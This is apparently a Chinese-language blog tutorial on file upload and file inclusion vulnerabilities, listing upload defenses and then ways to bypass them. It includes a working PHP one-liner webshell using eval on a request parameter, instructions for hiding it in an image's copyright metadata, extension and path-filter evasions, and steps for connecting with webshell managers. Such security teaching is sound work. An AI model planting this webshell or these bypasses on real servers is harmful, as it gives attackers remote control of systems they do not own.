文件上传漏洞(webshell)和文件包含漏洞

一、防护

1、防护

1、判断文件后缀,为图片的话才让上传成功。

2、解析文件内容(文件幻数)判断文件头和文件尾部是否一致
幻数
常见的

3、隐藏按钮(带上code唯一值)

4、二次渲染(类似拿着你的图片,我再拿手机在你的图片上拍上一张),删除缓存图片

5、文件重命名,避免从客户端拿取更多信息


2、绕过

1、文件后缀不一定非得是php结尾,也可以php5等等

调用示例

2、文件头检测(幻数)绕过

存在一种可以将php等等文件转换成png的方法

或者右键===》属性====》查看详情====》修改版权===》粘贴你的脚本即可(ps:需要在小马基础上加东西)

下面为小马

实际上存到jpg版权中的为

php 复制代码
<?php phpinfo();@eval($_REQUEST[777])?>

注意如果.../路径被过滤了可以使用.../

需要配合其他漏洞比如包含漏洞(比如php页面需要复用其他代码的时候,这个时候路径地址填写图片即可)

使用菜刀连接即可地址为包含php包含漏洞的地址
ps:如果不能菜刀直接连接的话,可以使用图片脚本生成脚本文件来连

3、隐藏按钮唯一值

抓包拦截修改参数就行

4、二次渲染

最后面的一句话

二、文件上传漏洞

可以通过判断系统上有什么环境,比如php和.net或者java等,上传对应webshell的文件,从而获取服务器一部分权限

webshell获取途径可以从GitHub上找到:::webshell

1、小马(一句话脚本)

需要上传后,使用中国蚁剑(antsword)配合着使用

  1. 打开中国中国蚁剑

  2. 右键添加数据 指定对应的小马文件

  3. 输入密码

  4. 右键点击打开终端

2、大马

无需使用中国蚁剑,打开web页面即可有对映执行页面。

相关推荐
淡水猫.1 小时前
ApacheSuperset CVE-2023-27524
安全·web安全
恰薯条的屑海鸥2 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)
网络·学习·安全·web安全·渗透测试·csrf·网络安全学习
Bruce_Liuxiaowei2 小时前
Web安全深度解析:源码泄漏与未授权访问漏洞全指南
安全·web安全
网安INF5 小时前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入
恰薯条的屑海鸥6 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十期-Over Permission 模块)
学习·安全·web安全·渗透测试·网络安全学习
痴人说梦梦中人13 小时前
自建 dnslog 回显平台:渗透测试场景下的隐蔽回显利器
web安全·网络安全·渗透测试·php·工具
Web极客码15 小时前
如何轻松、安全地管理密码(新手指南)
计算机网络·安全·web安全·网络安全
安全系统学习16 小时前
【网络安全】Qt免杀样本分析
java·网络·安全·web安全·系统安全
枷锁—sha18 小时前
护网行动面试试题(2)
web安全·面试·职场和发展
hanniuniu1318 小时前
网络安全厂商F5推出AI Gateway,化解大模型应用风险
人工智能·web安全·gateway